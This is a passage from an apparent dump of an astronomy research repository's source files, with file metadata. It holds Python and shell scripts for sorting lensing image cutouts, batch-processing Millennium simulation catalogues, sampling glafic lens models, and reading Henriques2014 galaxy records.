%s S17Anopsf/cutout_%.5f_%.5f_R_%d.fits\" % (list_cutout[i],coord[0],coord[1],i))\n if '-I-' in list_cutout[i]:\n if list_cutout[i] in cutoutspsf_i_cutout:\n psf = cutoutspsf_i_psf[np.where(cutoutspsf_i_cutout == list_cutout[i])[0][0]]\n coord = cutoutspsf_i_coord[np.where(cutoutspsf_i_cutout == list_cutout[i])[0][0]]\n if psf not in psf_onlybandi:\n os.system(\"cp %s S17AforJames/cutout_%.5f_%.5f_I.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17AforJames/psf_%.5f_%.5f_I.fits\" % (psf,coord[0],coord[1]))\n else:\n os.system(\"cp %s S17Aonebandpsf/cutout_%.5f_%.5f_I.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17Aonebandpsf/psf_%.5f_%.5f_I.fits\" % (psf,coord[0],coord[1]))\n else: os.system(\"cp %s S17Anopsf/cutout_%.5f_%.5f_I_%d.fits\" % (list_cutout[i],coord[0],coord[1],i))\n if '-Z-' in list_cutout[i]:\n if list_cutout[i] in cutoutspsf_z_cutout:\n psf = cutoutspsf_z_psf[np.where(cutoutspsf_z_cutout == list_cutout[i])[0][0]]\n coord = cutoutspsf_z_coord[np.where(cutoutspsf_z_cutout == list_cutout[i])[0][0]]\n if psf not in psf_onlybandz:\n os.system(\"cp %s S17AforJames/cutout_%.5f_%.5f_Z.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17AforJames/psf_%.5f_%.5f_Z.fits\" % (psf,coord[0],coord[1]))\n else:\n os.system(\"cp %s S17Aonebandpsf/cutout_%.5f_%.5f_Z.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17Aonebandpsf/psf_%.5f_%.5f_Z.fits\" % (psf,coord[0],coord[1]))\n else: os.system(\"cp %s S17Anopsf/cutout_%.5f_%.5f_Z_%d.fits\" % (list_cutout[i],coord[0],coord[1],i))\n if '-Y-' in list_cutout[i]:\n if list_cutout[i] in cutoutspsf_y_cutout:\n psf = cutoutspsf_y_psf[np.where(cutoutspsf_y_cutout == list_cutout[i])[0][0]]\n coord = cutoutspsf_y_coord[np.where(cutoutspsf_y_cutout == list_cutout[i])[0][0]]\n if psf not in psf_onlybandy:\n os.system(\"cp %s S17AforJames/cutout_%.5f_%.5f_Y.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17AforJames/psf_%.5f_%.5f_Y.fits\" % (psf,coord[0],coord[1]))\n else:\n os.system(\"cp %s S17Aonebandpsf/cutout_%.5f_%.5f_Y.fits\" % (list_cutout[i],coord[0],coord[1]))\n os.system(\"cp %s S17Aonebandpsf/psf_%.5f_%.5f_Y.fits\" % (psf,coord[0],coord[1]))\n else: os.system(\"cp %s S17Anopsf/cutout_%.5f_%.5f_Y_%d.fits\" % (list_cutout[i],coord[0],coord[1],i))\n\nos.chdir(\"/Users/cerusu/GITHUB/zMstarPDF/python/image_utilities\")\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 96, "blob_id": "de4cfb54d474cedbd784efb1f9a0faa29a47e879", "content_id": "932633209fa2d047e74cdad60e491e5cb68ba404", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 776, "license_type": "no_license", "max_line_length": 96, "num_lines": 8, "path": "/python/scripts/NAOJ/script_extractMillennium7.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "python extractMillennium_Henriques.py GGL_los_8_6_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_6_1_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_6_2_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_6_3_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_6_4_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_6_5_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py 
GGL_los_8_6_6_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_6_7_N_4096_ang_4_Henriques2014_galaxies_on_plane\n" }, { "alpha_fraction": 0.5135782957077026, "alphanum_fraction": 0.6046326160430908, "avg_line_length": 51.16666793823242, "blob_id": "4fb46e928f71aac6179f0fad6f0c3d8fa4bdac56", "content_id": "aa529c4b5e2a848da7b2cc36257fab3a1c4f425a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2504, "license_type": "no_license", "max_line_length": 346, "num_lines": 48, "path": "/python/catalogue_utilities/photozMilleniumcheckpresence.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# This code checks, for a given file in the simulation catalogue, if photoz has been computed successfully for each of the i<24 galaxies in the catalogue\n# run from the /code folder as: python photozMilleniumcheckpresence.py /Volumes/G-RAIDStudio/simulations/lensing_simulations/Guo_galaxies/GGL_los_8_7_7_0_0_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63.images.txt /Volumes/G-RAIDStudio/simulations/lensing_simulations/Guo_galaxies/GGL_los_8_7_7_0_0_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63.pdz nr\n# DO NOT RUN IT AT THE SAME TIME AS photozMilleniumcheckpresence.py because they use the same count.lst files\n# where nr is just a number, which should be different for each concurrent execution\n\nimport sys\nimport os\nfrom os import system\nimport time\n\nstart_timefield = time.time()\n\nos.system(\"wc %s > count%s.lst\" % (str(sys.argv[1]),str(sys.argv[3]))) # need to know how many lines in file 1\nwith open('count%s.lst' % str(sys.argv[3])) as count:\n    for line in count:\n        size=line.split()[0]\npos=0 # position in file 2\nposremember=0\n#print int(size)\nord=0 # position in file 1\nwith open(str(sys.argv[1])) as search_for:\n    for gal_for in search_for:\n        ord=ord+1\n        if gal_for!=\"\\n\":\n            if gal_for.split()[0]!=\"GalID\" and (float(gal_for.split()[15]) <= 24):\n                gal_for_ID = gal_for.split()[0]\n                present=\"false\"\n                with open(str(sys.argv[2])) as search_in:\n                    for i in xrange(pos):\n                        search_in.next()\n                    for gal_in in search_in:\n                        pos=pos+1\n                        if gal_in!=\"\\n\":\n                            if gal_in.split()[0]==gal_for_ID:\n                                present=\"true\"\n                                posremember=pos\n                                break\n                    #print pos\n                    if (pos==int(size)) and (present==\"false\"): #need the 2nd condition, or the last element is considered not found\n                        pos=posremember\n                        print gal_for_ID, \"not found!\"\n        if ord in [1000, 10000, 20000, 30000, 40000, 50000, 60000, 70000, 80000, 90000, 100000, 110000, 120000, 130000, 140000, 150000, 160000, 170000, 180000, 190000, 200000, 210000, 220000, 230000, 240000, 250000, 260000, 270000, 280000, 290000, 300000]:\n            print ord, \"objects...\"\nos.system(\"rm count%s.lst\" % str(sys.argv[3]))\n\nprint(\"Total time for field: --- %s seconds ---\" % (time.time() - start_timefield))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 96, "blob_id": "3866b3e46d8181879e579dad86d15dac1e54437b", "content_id": "bd2c61655b4bc609dfffde2cb72d6523c0772beb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 776, "license_type": "no_license", "max_line_length": 96, "num_lines": 8, "path": "/python/scripts/NAOJ/script_extractMillennium5.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "python extractMillennium_Henriques.py GGL_los_8_4_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython 
extractMillennium_Henriques.py GGL_los_8_4_1_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_4_2_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_4_3_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_4_4_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_4_5_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_4_6_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_4_7_N_4096_ang_4_Henriques2014_galaxies_on_plane\n" }, { "alpha_fraction": 0.5873417854309082, "alphanum_fraction": 0.7426160573959351, "avg_line_length": 49.375, "blob_id": "81b35157a0af7f06fc688cce57bce3a1ca95e904", "content_id": "4163a5d83029f527763fb46cf3142a358633dc91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1185, "license_type": "no_license", "max_line_length": 119, "num_lines": 24, "path": "/python/scripts/NAOJ/batch1_insertstars_.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb1_.out\n#PBS -e Logb1_.err\n#PBS -N 1_\n#PBS -l mem=15gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 23.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_1_N_4096_ang_4_rays_to_plane_34_f 23.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_2_N_4096_ang_4_rays_to_plane_34_f 23.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_3_N_4096_ang_4_rays_to_plane_34_f 23.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_4_N_4096_ang_4_rays_to_plane_34_f 23.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_5_N_4096_ang_4_rays_to_plane_34_f 23.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_6_N_4096_ang_4_rays_to_plane_34_f 23.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_7_N_4096_ang_4_rays_to_plane_34_f 23.5 45 measured 5 -1 -1\n" }, { "alpha_fraction": 0.5531741976737976, "alphanum_fraction": 0.610689103603363, "avg_line_length": 43.79268264770508, "blob_id": "06968a2112b73aace7e02c355958f121346b7505", "content_id": "157fac8645bde6410f001213e2b2691a96d2f4ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3686, "license_type": "no_license", "max_line_length": 440, "num_lines": 82, "path": "/python/modeling_utilities/samplelenslocation.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Samples from an observed lens parameter scatter (such as the lens position) and optimizes, then gathers the output of interest. In this particular case I sample from the lens position, and I adopt the limiting chi^2=9.21[ + best original fit chi^2] (Avni 1976 for 2 parameters at 3 sigma). When reading the chi^2 I only consider the point contribution, not the lens. 
For the lens contribution I compute it using the observed distance prior\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nimport corner\r\n\nsample = 10000\nposx = 0.74\nposx_sigma = 0.04\nposy = 0.75\nposy_sigma = 0.10\nx = np.random.normal(posx, posx_sigma, sample)\ny = np.random.normal(posy, posy_sigma, sample)\nlimchi = 0.13 + 9.21\n\nlistchi = np.array([])\nlistx = np.array([])\nlisty = np.array([])\nlist1 = np.array([])\nlist2 = np.array([])\nlist3 = np.array([])\nlist4 = np.array([])\n\r\nfilein = \"insample.input\"\nfileprior = \"priorsample.dat\"\nfileout = \"outsample_optresult.dat\"\nfileimag = \"outsample_point.dat\"\n\nfor i in range(sample):\n with open(filein, 'r') as f:\n glafic = f.readlines()\n glafic[28-1] = glafic[28-1].replace(glafic[28-1].split()[3],str(x[i]))\n glafic[28-1] = glafic[28-1].replace(glafic[28-1].split()[4],str(y[i]))\n glafic[29-1] = glafic[29-1].replace(glafic[29-1].split()[3],str(x[i]))\n glafic[29-1] = glafic[29-1].replace(glafic[29-1].split()[4],str(y[i]))\n with open(filein, 'w') as f:\n f.writelines(glafic)\n with open(fileprior, 'r') as f:\n prior = f.readlines()\n prior[1-1] = \"gauss lens 1 2 %s 0.01 \\n\" % str(x[i])\n prior[2-1] = \"gauss lens 1 3 %s 0.01 \\n\" % str(y[i])\n with open(fileprior, 'w') as f:\n f.writelines(prior)\r\n os.system(\"glafic %s\" % filein)\n with open(fileimag, 'r') as f:\n interest = f.readlines()\n if len(interest) == 5: # accept only if the model creates 4 images\n with open(fileout, 'r') as f:\n interest = f.readlines()\n for j in range(len(interest)):\n if \"point no 1\" in interest[j]:\n value = float(interest[j].split()[4]) + float(interest[j].split()[6]) + ((x[i]-posx)/posx_sigma)**2 + ((y[i]-posy)/posy_sigma)**2\n if value <= limchi:\n for j in range(len(interest)):\n if \"sie\" in interest[j]:\n value1 = float(interest[j].split()[5])\n value2 = float(interest[j].split()[6])\n for j in range(len(interest)):\n if \"pert\" in interest[j]:\n value3 = float(interest[j].split()[5])\n value4 = float(interest[j].split()[6])\n listchi = np.append(listchi,value)\n listx = np.append(listx,x[i])\n listy = np.append(listy,y[i])\n list1 = np.append(list1,value1)\n list2 = np.append(list2,value2)\n list3 = np.append(list3,value3)\n list4 = np.append(list4,value4)\nnp.savetxt(\"sample.dat\",np.c_[listchi,listx,listy,list1,list2,list3,list4],fmt=\"%.6e %.6e %.6e %.6e %.6e %.6e %.6e\")\n\nsample = np.loadtxt(\"sample.dat\",unpack=True)\n#sample1 = sample[0][sample[0] < 2.3+0.13]\n#sample2 = sample[1][sample[0] < 2.3+0.13]\n#sample3 = sample[2][sample[0] < 2.3+0.13]\n#sample4 = sample[3][sample[0] < 2.3+0.13]\n#sample5 = sample[4][sample[0] < 2.3+0.13]\n#sample6 = sample[5][sample[0] < 2.3+0.13]\n#sample7 = sample[6][sample[0] < 2.3+0.13]\n#sample=np.vstack((sample1,sample2,sample3,sample4,sample5,sample6,sample7))\nfigure = corner.corner(sample[1:np.shape(sample)[0]].T, labels=np.linspace(1,np.shape(sample)[0],np.shape(sample)[0]).astype(int).tolist(),quantiles=[0.16, 0.5, 0.84],show_titles=True, title_kwargs={\"fontsize\": 12})\nfigure.savefig(\"sample.png\", dpi=100)\n\n\r\n\r\n" }, { "alpha_fraction": 0.46459347009658813, "alphanum_fraction": 0.5020607113838196, "avg_line_length": 96.40876007080078, "blob_id": "d00a455c2469d7113ca5bd90b07d178552ceadfb", "content_id": "e51eff4086000fd4b13cd56f1bcbe5b91b917218", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13345, "license_type": "no_license", "max_line_length": 292, "num_lines": 137, "path": 
"/python/catalogue_utilities/class_Henriques2014.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "import numpy as np\n\nclass Henriques2014():\n \"\"\"\n Returns the structure of the files of type GGL_los_8_0_0_N_4096_ang_4_Henriques2014_galaxies_on_plane_63_f.images.\n \"\"\"\n galaxy_struct = np.dtype([\n ('galaxy_id' ,'i8' ), #0_LL $ , , id of galaxy (unique)\n ('halo_id' ,'i8' ), #0_LL $ , , id of (sub)halo, the galaxy belongs to(?)\n ('first_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('next_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('last_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('FOF_central_gal' ,'i8' ), #0_LL $ , , id of fof halo the galaxy belong to (i.e. common id for all galaxies in same group or cluster)\n ('file_tree_nr' ,'i8' ), #0_LL $ , , id of file containing the merger tree the galaxy belongs to\n ('descendant_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('main_leaf_id' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('tree_root_id' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('subhalo_id' ,'i8' ), #0_LL $ , , id of (sub)halo, the galaxy belongs to(?)\n ('main_subhalo_id' ,'i8' ), #0_LL $ , , id of main (sub)halo of fof halo, the galaxy belongs to(?)\n ('peano_key' ,'i4' ), #0L $ , , id of small subcube of simulation cube containing galaxy\n ('redshift' ,'f4' ), #0.0 $ , , redshift of galaxy\n ('type' ,'i4' ), #0L $ , , indicated positional status of galaxy in fof group (0 = central, 1 = satellite with subhalo, 2= satellite without resolved subhalo)\n ('snapshot_number' ,'i4' ), #0L $ , , simulation snapshot the galaxy belongs to\n ('group_number' ,'i4' ), #0L $ , , yet another id of the fof halo the galaxy belongs to\n ('next_group_number' ,'i4' ), #0L $ , , yet another id of the fof halo the galaxy will belong to in the next snapshot\n ('cube_index' ,'i4' ), #0L $ , , index of periodic copy of simulation cube the galaxy is located\n ('central_m_vir' ,'f4' ), #0.0 $ , [10^10 Msun/h] , virial mass (as defined by m_crit200) of the FOF group the galaxy resides in.\n ('central_r_vir' ,'f4' ), #0.0 $ , [Mpc/h] , virial radius (as defined by r_crit200) of the FOF group the galaxy resides in\n ('position' ,'f4', 3), #fltarr(3) $ , [rad, rad, Mpc/h] , angular position (first two components) and line-of-sight comoving distance (last component) of galaxy\n ('velocity' ,'f4', 3), #fltarr(3) $ , [km/s] , physical peculiar velocity of galaxy (first two components transverse, last component parallel to l.o.s.)\n ('len' ,'i4' ), #0L $ , , number of particle in subhalo associated with galaxy\n ('m_vir' ,'f4' ), #0.0 $ , [10^10 Msun/h] , virial mass (as defined by m_crit200) of the FOF group this galaxy was in when last it was a type 0 galaxy. I.e. current mass for type 0 galaxies, \"infall virial mass\" for type 1,2 galaxies.\n ('r_vir' ,'f4' ), #0.0 $ , [Mpc/h] , comoving virial radius (as defined by r_crit200) of the FOF group this galaxy was in when last it was a type 0 galaxy. I.e. 
current virial radius for type 0 galaxies, \"infall virial radius\" for type 1,2 galaxies\n ('v_vir' ,'f4' ), #0.0 $ , [km/s] , physical virial velocity of the subhalo the galaxy is/was the center of.\n ('v_max' ,'f4' ), #0.0 $ , [km/s] , physical maximum rotational velocity of the subhalo of which this galaxy is the center, or the last value for satellite galaxies.\n ('gas_spin' ,'f4', 3), #fltarr(3) $ , [Mpc/h km/s] , spin of the cold gas disk of galaxy\n ('stellar_spin' ,'f4', 3), #fltarr(3) $ , [Mpc/h km/s] , spin of the stellar disk of galaxy\n ('infall_v_max' ,'f4' ), #0.0 $ , [km/s] , physical maximum rotational velocity of the host halo of this galaxy at infallSnap.\n ('infall_v_max_peak' ,'f4' ), #0.0 $ , [km/s] , physical maximum past rotational velocity of the host halo of this galaxy.\n ('infall_snap' ,'f4' ), #0L $ , , id of snapshot the galaxy lost type = 0 status\n ('infall_hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun/h] , mass in hot gas at the time of infall (same as hotGas for type 0 galaxies).\n ('hot_radius' ,'f4' ), #0.0 $ , [Mpc/h] , radius out to which hot gas extends: rvir for type 0; 0 for type 2; maximum radius out to which hot gas is not stripped for type 1.\n ('ori_merg_time' ,'f4' ), #0.0 $ , [yr] , estimated dynamical friction time (in years) when the merger clock is set.\n ('merg_time' ,'f4' ), #0.0 $ , [yr] , estimated remaining merging time (in years). oriMergeTime - time since the merger clock is set.\n ('distance_to_central_gal' ,'f4', 3), #fltarr(3) $ , [Mpc/h (?)] , distance between this galaxy and the central galaxy of the fof group\n ('cold_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , Mass in the cold gas disk.\n ('stellar_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , total mass in stars in the disk and the bulge together.\n ('bulge_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of stars in the bulge.\n ('disk_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of stars in the disk.\n ('hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in hot gas.\n ('ejected_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in the ejected mass component\n ('black_hole_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of the central black hole\n ('ICM' ,'f4' ), #0.0 $ , (?)\n ('metals_cold_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in cold gas\n ('metals_bulge_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in bulge\n ('metals_disk_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in disk\n ('metals_hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in hot gas\n ('metals_ejected_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in the ejected mass component\n ('metals_ICM' ,'f4' ), #0.0 $ , (?)\n ('primordial_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Accretion rate of primordial gas.\n ('cooling_rate' ,'f4' ), #0.0 $ , [Msun/yr] , cooling rate\n ('cooling_rate_before_AGN' ,'f4' ), #0.0 $ , [Msun/yr] , cooling rate if there was no AGN feedback.\n ('sfr' ,'f4' ), #0.0 $ , [Msun/yr] , Star formation rate\n ('sfr_bulge' ,'f4' ), #0.0 $ , [Msun/yr] , Star formation rate in bulge.\n ('x_ray_lum' ,'f4' ), #0.0 $ , [log10(erg/sec)] , Log10 of X-Ray luminosity in erg/sec\n ('bulge_size' ,'f4' ), #0.0 $ , [Mpc/h] , Half mass radius of bulge\n ('stellar_disk_radius' ,'f4' ), #0.0 $ , [Mpc/h] , Size of the stellar disk, 3x the scale length.\n ('gas_disk_radius' ,'f4' ), #0.0 $ , [Mpc/h] , Size of the gas disk (?)\n ('cos_inclination' ,'f4' ), #0.0 $ , (?)\n ('disrupt_on' ,'i4' ), #0L $ , , 0: galaxy 
was disrupted before merging onto its descendant, matter went into ICM of merger center\n ('merge_on' ,'i4' ), #0L $ , , 0: merger clock not set yet;\n ('cooling_radius' ,'f4' ), #0.0 $ , [Mpc/h] , the radius within which the cooling time scale is shorter than the dynamical timescale\n ('quasar_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Rate at which cold gas is accreted into the central black hole in the quasar mode.\n ('radio_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Rate at which hot gas is accreted into the central black hole in the radio mode.\n ('mag' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy (magnification included, dust extinction not included ?)\n ('mag_bulge' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy bulge (magnification included, dust extinction not included ???)\n ('mag_dust' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy (magnification included, dust extinction included ?)\n ('mass_weight_age' ,'f4' ), #0.0 $ , [10^9 yr] , The age of this galaxy, weighted by mass of its components.\n ('rband_weight_age' ,'f4' ), #0.0 $ , [10^9 yr] , The age of this galaxy, weighted by the r-band luminosity of its components.\n ('sfh_ibin' ,'i4' ), #0L $ , , Index of the highest star formation history bin currently in use.\n ('sfh_numbins' ,'i4' ), #0L $ , , Number of non-empty star formation history bins.\n ('distortion' ,'f4',(2,2)), #fltarr(4) $ , , (11, 12, 21, 22)-components of distortion matrix\n ('plane_number' ,'i4' ) #0L $ , , index of redshift slice (and lens plane) the galaxy is associated with\n ])\n\n filter_number_for_c_johnson_U = 0\n filter_number_for_c_johnson_B = 1\n filter_number_for_c_johnson_V = 2\n filter_number_for_c_johnson_rc = 3\n filter_number_for_c_johnson_ic = 4\n filter_number_for_vista_johnson_Z = 5\n filter_number_for_vista_johnson_Y = 6\n filter_number_for_vista_johnson_J = 7\n filter_number_for_vista_johnson_H = 8\n filter_number_for_c_johnson_K = 9\n filter_number_for_vista_johnson_ks = 10\n filter_number_for_i1_band = 11\n filter_number_for_i2_band = 12\n filter_number_for_i3_band = 13\n filter_number_for_i4_band = 14\n filter_number_for_u_band_trans = 15\n filter_number_for_g_band_trans = 16\n filter_number_for_r_band_trans = 17\n filter_number_for_i_band_trans = 18\n filter_number_for_z_band_trans = 19\n filter_number_for_ACS_WFC_F435W = 20\n filter_number_for_ACS_WFC_F475W = 21\n filter_number_for_ACS_WFC_F606W = 22\n filter_number_for_ACS_WFC_F625W = 23\n filter_number_for_ACS_WFC_F775W = 24\n filter_number_for_ACS_WFC_F814W = 25\n filter_number_for_ACS_WFC_F850_LP = 26\n filter_number_for_GALEX_FUV = 27\n filter_number_for_GALEX_NUV = 28\n filter_number_for_NIC_F110W = 29\n filter_number_for_NIC_F160W3 = 30\n filter_number_for_VIMOS_U = 31\n filter_number_for_WFC3_IR_F105W = 32\n filter_number_for_WFC3_IR_F125W = 33\n filter_number_for_WFC3_IR_F160W = 34\n filter_number_for_WFC3_UVIS_F225W = 35\n filter_number_for_WFC3_UVIS_F275W = 36\n filter_number_for_WFC3_UVIS_F336W = 37\n filter_number_for_WFPC2_F300W = 38\n filter_number_for_WFPC2_F450W = 39\n\n# with open(\"/lfs08/rusucs/0408/GGL_los_8_0_0_N_4096_ang_4_Henriques2014_galaxies_on_plane_1_f.images\", mode = 'rb') as file:\n# lower_bound = np.fromfile(file, 'f8', 2)\n# upper_bound = np.fromfile(file, 'f8', 2)\n# plane_angle, = np.fromfile(file, 'f8', 1)\n# redshift, = np.fromfile(file, 'f8', 1)\n# n_galaxies, = np.fromfile(file, 'i8', 1)\n# n_cells = np.fromfile(file, 'i4', 2)\n
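# The line below parses all n_galaxies packed records in a single call, using the\n# galaxy_struct dtype defined above; fields can then be addressed by name, e.g.\n# (illustrative sketch, with h an assumed Hubble parameter, since the field is\n# stored in units of 10^10 Msun/h): mstar_msun = galaxy['stellar_mass'] * 1e10 / h\n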
# galaxy = np.fromfile(file, galaxy_struct, n_galaxies)\n# xi = galaxy['mag'][:,filter_number_for_i_band_trans]\n# x0 = galaxy['redshift']\n# x = np.c_[x0,xi]\n" }, { "alpha_fraction": 0.6773049831390381, "alphanum_fraction": 0.7056737542152405, "avg_line_length": 20.69230842590332, "blob_id": "f486a2eedae766ad2bc3c608d06aaf81d228dac7", "content_id": "8f947e9da6fad15de4bb09216f8047633cc466dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 282, "license_type": "no_license", "max_line_length": 75, "num_lines": 13, "path": "/python/modeling_utilities/func.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# outputs the result of a function to stdout\n# I use it as the first step in learning how to combine C++ and python code\n# run as python func.py 0.1 0.1\n\nimport sys\nimport os\nfrom os import system\nimport numpy as np\n\nx = float(sys.argv[1])\ny = float(sys.argv[2])\n\nprint x**2 + y**2\n" }, { "alpha_fraction": 0.4670391082763672, "alphanum_fraction": 0.5273743271827698, "avg_line_length": 28.83333396911621, "blob_id": "33e49f611ca7e58cf94261c156b8c04266524213", "content_id": "2430ba733ce3d95be6bb73134fcbe8e9b8b12f3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 895, "license_type": "no_license", "max_line_length": 134, "num_lines": 30, "path": "/python/kappacoord.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# run as: python kappacoord.py /Volumes/G-RAIDStudio/simulations/lensing_simulations/GGL_los_8_7_6_N_4096_ang_4_rays_to_plane_37_f.dat\n\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\ndegree=np.pi/180\nL_field=4.0*degree\nN_pix_per_dim = 4096\nL_pix = L_field / N_pix_per_dim\n\ni=0\nos.system(\"rm %s_pos.lst\" % str(sys.argv[1])[0:len(str(sys.argv[1]))-4])\nwith open(str(sys.argv[1])) as f:\n for line in f:\n if (line!=\"\\n\"):\n if i%1000==0:\n print i\n kappa=float(line.split()[1])\n x=1+i/4096\n y=1+i%4096\n posx = -0.5 * L_field + (x + 0.5) * L_pix\n posy = -0.5 * L_field + (y + 0.5) * L_pix\n g=open('%s_pos.lst' %str(sys.argv[1])[0:len(str(sys.argv[1]))-4],'a')\n g.write('%s %s %s %s %s \\n' % (posx, posy, x, y, kappa))\n g.close()\n i=i+1\n\nprint \"Done!\"\n" }, { "alpha_fraction": 0.6245847344398499, "alphanum_fraction": 0.7408638000488281, "avg_line_length": 42, "blob_id": "b553369e886f1ec4fdd73e30e029d5bafb7e9382", "content_id": "c815b5d71597c70ebd43c314a591aaa445f852e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 301, "license_type": "no_license", "max_line_length": 121, "num_lines": 7, "path": "/python/scripts/UCLA/script.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": ". 
